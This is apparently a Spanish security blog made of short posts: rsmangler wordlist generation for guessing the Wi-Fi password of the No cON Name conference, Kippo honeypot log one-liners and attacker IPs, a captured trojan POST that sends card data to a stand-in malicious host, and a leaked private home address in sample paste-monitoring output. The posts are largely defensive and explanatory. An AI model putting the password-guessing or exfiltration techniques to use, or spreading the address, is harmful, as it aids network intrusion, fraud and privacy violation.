Imaginemos pues, que nos estamos enfrentando a la red Wireless que están usando en el congreso No cON Name.

Es comun que usen como password nombres propios de la organización o evento, pensemos que han usado un password que se parezca a No cON Name, así que, en vez de crear la lista de palabras a mano usaremos un generador de palabras, de manera que podamos abarcar todas las opciones posibles.

Para ello, vuelvo a traer rsmangler que nos ayudará en ello.

Así que generamos un fichero con la lista de palabras, en mi caso noconname

Y usamos rsmangler para que nos ayude a generar el diccionario deseado.

Así que usamos

rsmangler.rb –file palabras.txt >> dic.txt

Y el resultado que obtenemos, que lo he recortado para que sea mas fácil de mirar es:

oconnamenoconname
emannocon
Noconname
NOCONNAME
noconnameed
noconnameing
n0c0nn4m3
noconname!
noconname@
noconname
noconname�
noconname$
noconname%
noconname^
noconname&
noconname*
noconname(
noconname)
01noconname
noconname01
02noconname
noconname02
03noconname
noconname03

Hay un total de 283 palabras para probar

Post cortito para un día liado.

Kippo que es el honeypot que estoy usando va guardando un log por día, ahora mismo tengo unos 6 archivos de log distintos así que ahora lo que voy ha hacer es contar la cantidad de logones fallidos del total de logs.

cat kippo.log | awk ‘/failed/ { print $5 }’ | grep -v on | wc -l

En una semana el resultado a sido de 4782 accesos de logon fallidos. ¿Increible no?

Ahora vamos al apartado de las Ip’s porque al intentar el acceso de logon, la IP queda registrada.

Para extraer la IP:

cat kippo.log.6 | awk ‘/HoneyPotTransport/ { print $3 }’ | cut -d “,” -f3 | grep -v SSH | cut -d “]” -f1 | sort -u

Han habido 7 IP’s implicadas en el ataque, de estas Ip, los ataques vienen de EStados unidos, de China, de Mongolia, y.. de ESPAÑA!

La lista de IP’s era:

116.114.20.148
173.255.246.112
199.127.103.157
203.34.37.16
211.154.224.238
37.157.249.167
80.103.180.135

Ahora pasamos a la parte de usuarios y password, empezamos

 cat kippo.log.6 | awk ‘/attempt/ { print $9 }’ | cut -d “[" -f2 | cut -d "]” -f1

La cantidad de combinaciones que se han usado es 4502

De estas combinaciones, la cantidad de usuarios únicos ha sido de 3744

Para la parte de contraseñas se han usado 4034

En la parte de RDP, que también dejé capturando que llegaba, también han habido resultados

Las ip’s registradas son:

112.64.207.90
12.198.222.17
125.211.197.142
184.105.139.216
204.140.27.133
211.191.168.25
229.143.195.200
2.50.27.150
82.144.67.181

Son Ip’s procedentes de Rusia, China, Emiratos Árabes etc..

Dentro de poco tengo pensado montar otro tipo de Honeypot, de parte web por ejemplo. Será una buena fuente de información

Hay que tener mucho cuidado con lo que se va dejando por ahí, un log en Pastebin, Metadatos en los documentos, son cosas que cada vez hay que concienciarse de que no se deben tomar a la ligera.

Ya existen herramientas que monitorizan Pastebin, de manera que cuando aparece un dato de interés a los que estan detrás de esa informaciónes les es, muy fácil el poder enterarse.

Otro tipo de servicios es el que traigo se trata leakedin, Este servicio se encarga de dar a conocer en que sitios (Pastebin), se ha colgado información que podria ser, mas bien información personal.  Un archivo subido a Dropbox, una clave RSA etc..

Podemos encontrara cosas como:

Detected 1 occurrence(s) of ‘http[s]*:\/\/dl\.dropbox\.com\/’:

<img src="http://dl.dropbox.com/u/149660/389075560.jpg">

Send a SELF-ADDRESSED STAMPED ENVELOPE (this means it has your address already written on it and an unused stamp in the upper-right corner!) to:

Ben Combee<br>
5607 Joe Sayers Ave<br>
Austin, TX 78756<br>

If you include somethin

Sin duda interesante.

La web del proyecto la podéis encontrar aquí.

Tened cuidado lo que vais dejando por ahí.

Una de las cosas bastante eficaces que se pueden es que a ciertos dominios/IP no nos podamos conectar, así nos protegeremos. ¿Como se consigue esto? Pues haciendo que dichas peticiones a ciertos sitios siempre vayan 127.0.0.1 es decir, a localhost.

¿Esto de que nos libra?

Pues nos libra de que si navegamos por ejemplo por páginas webs legítimas, que contienen por ejemplo un iframe a un “conocido” host que contiene malware la conexión no se realizará.

Otro caso es por ejemplo el de troyanos que se dedican por ejemplo a pedirte los datos bancarios “por seguridad”. Obviamente estos troyanos lo que buscan es engañar al usuario para que introduzca sus datos bancarios y poder enviarlos a un host destino.

Si miramos ese tipo de trazas con Wireshark, veríamos algo del tipo

POST /images/check.asp HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 962
Host: DOMINIO_MALICIOSO
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

1=45678976&2=1234&3=1234&4=47897654&5=4567&6=5467&7=5879654774587741&8=06%2F14&9=887&10=7188&11=145%2D4564&12=146%2D5646&13=147%2D5456&14=148%2D4564&15=149%2D5645&16=150%2D6156&17=151%2D1894&18=152%2D8918&19=153%2D9189&20=154%2D1891&21=155%2D8984&22=156%2D5445&23=157%2D6156&24=158%2D1561&25=159%2D5615&26=160%2D6118&27=161%2D9948&28=162%2D9489&29=163%2D1891&30=164%2D8918&31=165%2D1891&32=166%2D8189&33=167%2D1891&34=168%2D8918&35=169%2D9189&36=170%2D1891&37=171%2D8918&38=172%2D1891&39=173%2D1998&40=174%2D1891&41=175%2D8918&42=176%2D9115&43=177%2D1561&44=178%2D1156&45=179%2D1565&46=180%2D1561&47=181%2D5619&48=182%2D1984&49=183%2D8948&50=184%2D9189&51=185%2D1891&52=186%2D9919&53=187%2D8189&54=188%2D1891&55=189%2D8918&56=190%2D9189&57=191%2D1189&58=192%2D1891&59=193%2D8918&60=194%2D9189&61=195%2D8918&62=196%2D9891&63=197%2D8918&64=198%2D9189&65=199%2D1981&66=200%2D8918&67=201%2D9189&68=202%2D1981&69=203%2D8918&70=204%2D9811&71=manodacaixa%40gmail%2Ecom&HTTP/1.1 200 OK
Connection: keep-alive
Date: Tue, 22 May 2012 12:40:57 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASSSCADB=BIJLMGIBAJPPPDFIDBPMKBJH; path=/
Cache-control: private

Todo el “churro” que se envía son los datos que el usuario ha rellenado sobre su tarjeta, su PIN etc…

Si el HOST destino, ya se conoce como malicioso los datos nunca se enviarían, es decir, nos ofrece protección en la navegación y en el envío de datos a URL/Ip maliciosas.

Otro tipo de troyanos, lo que hacen es, una vez que han infectado la máquina se descargan mas binarios de su servidor que les hace de panel de control (C&C).

Se podría mitigar también redirigiendo las peticiones a localhost.

Y es  por eso, por lo que proyectos como hphosts nos ayudan en esta tarea.

Descargamos el archivo de aquí

¿Que tenemos en este archivo?

C:\Users\seifreed\Downloads\hphosts>wc -l HOSTS.txt
183792 HOSTS.txt

Tenemos  183792 entradas repartidas entre IP’S y URL que son de carácter malicioso, de manera que si intentan conectarse fallarán.

Y eso es todo por hoy

He probado diversidad de software y al final la solución que mejor me ha ido es la que menos me esperaba, desde luego.

Uno de los primeros software que probé fue el de GPG4Win, este Software ne funciono bien en otras ocasiones con versiones de Outlook 2003 y 2007, funcionaba bien, y no quedaba colgado ni nada.

Pero en las nuevas versiones de Outlook, la 2010 ya no funciona , Entonces probé otro software, gpg4o, este software una vez lo instalas parece que todo es muy bonito pero es una trial por lo que poco puedes usarlo en realidad.

Otro de los software que aparecía como referencia es OutlookGnuGPG. Este addon es solo para Outlook 2007, así que también te quedas sin soporte en las últimas versiones de Outlook 2010.

Además estaba buscando una solución que no me volviera el cliente de correo lento.. y que me permitiera elegir de manera “elegante” las claves.

Y por fin “llego la luz” y pude encontrar la solución que estaba buscando, se trata de Outlook privacy plugin.

Este addon funciona PERFECTAMENTE en versiones Outlook 2010 tanto en x86 como en x64.

Así que, no sufráis mas, con esto ya os sirve por si necesitáis poder firmar en Outlook 2010.

Se trata de Outlook privacy plugin

Se queda instalado como un complemento mas en Outlook

Así que quedará perfectamente instalado para que se pueda usar de manera cómoda.

Los kits de explotación suelen venderse en el mercado negro, sobre precios asequibles, por ejemplo:

• $ 200 x 1 semana
• $ 300 x 2 semanas
• $ 400 x 3 semanas
• $ 500 mensuales
• $ 50 x 24 horas de prueba 

Estas estadísticas pertenecen al blog de Malware Intelligence

De los kit de explotación, creo que el mas famoso actualmente se trata del Blackhole y el más caro ya que se actualizar muy rápido.

Si miramos una gráfica del año pasado segun Kaspersky, aquí tenéis un ejemplo de la detección:

Lo mas importante de los kits de explotación es la rapidez con la que se puedan actualizar, cuando te encuentras uno de estos kits de explotación suelen estar protegidos con usuario y password.

Estos paneles no suelen ser vulnerables a inyecciones SQL y las contraseñas no son las típicas pues ya se cuidan de proteger estos paneles.

Los kits suelen contener la parte de servidor web, donde se aloja el kit, además contiene estadísticas de usuarios infectados, o de acceso a los exploits, además suelen alojasrse en servidores Bullet-PROFF Hosting o incluso en algún host legítimo comprometido.

Si quieres conocer un listado actualizado y una review de los kits de explotación, puedes consultar la siguiente lista.

Update Exploits kit

Mantra es un proyecto muy vivo que nos sirve para realizar auditorías de páginas webs por ejemplo, o en mi caso que lo utilizo para analizar algun caso de phishing ya que tiene complementos para ir analizando las cabeceras.

Lo que me gusta de Mantra es que te agrupa las herramientas en menús y por categorías.

Además tiene muy bien solucionado el tema de administración de plugins y permite actualizar todos los complementos y administrarlos

La web del proyecto está aquí. http://www.getmantra.com/

Entrada escueta para este Viernes

Facebook es una de las redes sociales mas usadas, y no se libra de ser víctima de ataques por partes de los criminales.

Por ejemplo la noticia que salió hace tiempo de que los usuarios de Facebook, fueron víctimas de un ataque de SPAM

Una de las recomendaciones que se dan en seguridad, no solo en las redes sociales es elegir una buena contraseña

• Elegir una contraseña fuerte, que contenga letras, número y símbolos y si es posible mayúculas y minúculas.
• No la compartas con nadie
• No uses la misma contraseña para todas tus cuentas
• Cambia la contraseña regularmente

Si recordar una contraseña compleja nos cuesta, existen utilidades para recordar este tipo de cuentas. Una de las utilidades que mas me gustan es Keepass.

Realizar Logout de Facebook

Es muy importante coger la costumbre de realizar Logout en Facebook y en los demás servicios ya que, si cogemos esa costumbre cuando hagamos login fuera de nuestro entorno diario, que puede ser nuestro puesto de trabajo o nuestra casa nos recordaremos de desconectar ya que otro usuario podría entrar en nuestra cuenta si no hemos salido de manera correcta.

Scam en Facebook

El Scam es una de las armas que se usan en Internet para seguir consiguiendo que los usuarios caigan en este tipo de fraudes y sean, infectados por malware o bien sean conducidos a un phishing.

Código malicioso en Facebook

Existen ciertos códigos maliciosos que, mediante anuncios en ciertas páginas invitan al usuario, mediante ingeniería social a realizar ciertas acciones que por ejemplo mediante código malicioso recoger todas nuestras amistades y ponerles un video o el enlace a malware.

Clickjacking

Este tipo de amenaza es poco conocida y muy peligrosa para los usuarios finales.

En este tipo de amenazas, por ejemplo el usuario clica en un Me gusta y en realidad por debajo esta realizando otras acciones

Conectando a Facebook por HTTPS

Es muy importante conectarse por HTTPS, ya que ciframos nuestras conexiones y nuestros datos viajan seguros

Estos son algunos de los consejos que podéis seguir.

El proyecto se basa en el uso de claves GPG, como funcionan este tipo de claves

Cuando iniciamos Retroshare lo primero que nos piden es nuestra clave pública

Usaremos la clave pública con Retroshare y, además crearemos un lugar donde configuraremos Retroshare.

Cuando eligamos la clave pública nos pedirá el password para configurar nuestra clave pública con Retroshare

Una de las características de Retroshare es que permite enviar correos privados entre los que permanecen en el círculo de confianza

Además de correos también nos permite tener un sistema de foros anónimo, la verdad es que la plataforma ofrece todo lo que necesitas.

Y por si fuera poco también nos permite tener configurado mensajería instantánea cifrada

Podemos en las opciones de Retroshare configurar para que nos avise mediante notificaciones con segun que eventos

En la parte de servidor nos permite configurar con las necesidades que queramos

Para añadir a un amigo, sólo lo podremos añadirlo bajo circumstancias especiales

Tendremos a la vista rapidamente que carpetas tenemos configuradas en Rettroshare

Y, podremos poner que carpeta queremos poner como carpeta compartida

Hasta aquí las cosas que podemos llegar ha hacer con Retroshare, la verdad es que es una de las mejores maneas de tener un entorno bien configurado y seguro! No hay excusa

El cifrado XOR en si, es vulnerable y se puede conseguir la clave al comparar varios mensajes cifrados en XOR

Existe una manera rápida de saber si realmente lo que estamos buscando se encuentra dentro de un archivo de configuración de esa manera podemos rápidamente hacer fuerza bruta de un string en un archivo cifrado.

La utilidad es del gran Didier Steven, el “mago de los PDF”, se llama xorsearch con esta utilidad podremos de manera muy sencilla hacer búsquedas contra un fichero cifrado con XOR.

Aquí tenemos un ejemplo del fichero en ascii, no se puede leer por lo tanto haremos una búsqueda con xorsearch

Descargamos la utilidad de aquí.

Ahora hacemos la búsqueda contra el fichero cifrado:

C:\Users\seifreed\Desktop>xorsearch config.dat credem.it Found XOR 11 position 1637: credem.it

Podemos ver que ha encontrado lo que estábamos buscando así que nos sirve para realizar las búsqueda de cosas concretas en archivos cifrados con xor.